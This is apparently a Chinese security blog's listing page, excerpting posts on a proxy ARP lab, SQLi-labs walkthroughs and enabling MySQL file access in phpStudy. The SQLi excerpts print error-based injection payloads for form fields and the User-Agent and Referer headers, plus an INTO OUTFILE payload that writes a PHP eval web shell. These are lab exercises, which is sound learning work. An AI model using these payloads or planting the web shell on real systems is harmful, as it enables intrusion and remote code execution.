安全
吟缺斯汀
生活不止只有眼前的苟且
展开
-
代理ARP小实验
搭建拓扑如下 PC1,PC2均使用路由器改变symbol来模拟 一、关闭PC1/2的路由功能,当作纯电脑 PC1的MAC R1两接口的MAC PC2的MAC 当PC1与PC2进行通信后,查看arp表,获得的MAC为R1左边接口的MAC地址 代理arp实现 二、回归路由状态 使用静态路由让其互联互通 1.使用出接口的方式(是代理ARP,请求的是不同网段) 、 清除PC1arp表的缓存 重新ping,查看arp表依旧是R1左接口的mac 代理a原创 2020-10-16 18:25:16 · 475 阅读 · 0 评论 -
sqlilab 17-22简略版
1.POST update注入(17关) 爆出数据库的版本,1' or updatexml (1,concat(0x7e,version(),0x7e),1) # 2.Header报错 (18关) 在UA末尾添加'报错,存在注入点 注入语句:1',1,updatexml(1,concat(0x7e,database(),0x7e),1)) # 爆出数据库为security 3.Referer(19关) 在Referer末尾加单引号,报错 Referer: 1' and up.原创 2020-07-29 19:26:31 · 338 阅读 · 0 评论 -
sqlilabs第七关
outfile导出文件 用到了一个outfile函数,可以将sql语句的结果导出在文件中 先查询一下导出的目录位置 导出文件 load_file写入文件 导出一句话木马 id=-1')) union select 1,"<?php @eval($_GET['cmd']); ?>",3 into outfile "D:\\phpStudy\\2.txt" --+ ...原创 2020-07-28 18:33:34 · 2436 阅读 · 0 评论 -
sqlilab第一关
1.判断注入方式为字符型 输入正常id=1 注入引号 可以推断查询语句为select * from users where id=1 limit 0,1; (ps:users表只是举例) 打开第一关的php源码查看结果 打开数据库命令行查询结果 2.查询库名 <1>判断表有几列 当输入order by 3时未报错,而order by 4报错,说明表有三列 <2>判断回显的位置 为了union后的语句可生效,需将之前的报错,改为-1 se.原创 2020-07-28 15:08:41 · 2016 阅读 · 0 评论 -
phpstudy中Mysql命令行对文件的读取
首先,在命令行查看secure_file_priv为null,这是万万不行滴 打开Phpstudy,选择“其他菜单选项”-“打开配置文件”-“mysql-ini” 添加secure_file_priv=,后面不要写东西 重启数据库,重启数据库,重启数据库!!! 再次查询已经为空 现在来试试读取文件内容 在某盘创建文件写入内容 查询,完全Ok ...原创 2020-07-25 18:54:45 · 618 阅读 · 0 评论